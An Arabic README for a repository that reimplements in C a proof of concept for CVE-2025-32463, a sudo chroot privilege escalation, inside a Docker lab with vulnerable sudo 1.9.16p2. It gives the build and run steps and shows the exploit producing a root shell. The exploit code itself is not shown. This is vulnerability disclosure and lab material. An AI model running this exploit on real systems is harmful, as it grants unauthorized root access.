
إعادة تنفيذ بلغة C لـ chwoot PoC
يوفر هذا المستودع بيئة بسيطة وقابلة للتكرار لإظهار ثغرة CVE‑2025‑32463 لتصعيد الامتيازات في ميزة chroot الخاصة بـ sudo.
الإصدارات الضعيفة من sudo 1.9.14 إلى 1.9.17 (جميع المراجعات p) على معظم توزيعات لينكس تتأثر.
صفحات الأمان
| الملف | الغرض |
|---|---|
| Dockerfile | إنشاء صورة Ubuntu 24.04 مع sudo 1.9.16p2 الضعيف وأدوات البناء |
| sudo‑chwoot.sh | استغلال إثبات المفهوم الذي يفتح شل جذر داخل chroot |
| run.sh | سكريبت مساعد يبني الصورة (إذا لزم الأمر) ويطلق حاوية الاستغلال |
# Vulnerable sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463
# 2 – build and run Docker image (tagged "vpr-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#
run.sh يمرر --privileged و --rm إلى Docker بحيث تقوم الحاوية بتنظيف نفسها عند الخروج.
قم بإزالة الصورة عند الانتهاء:
docker rmi vpr-chwoot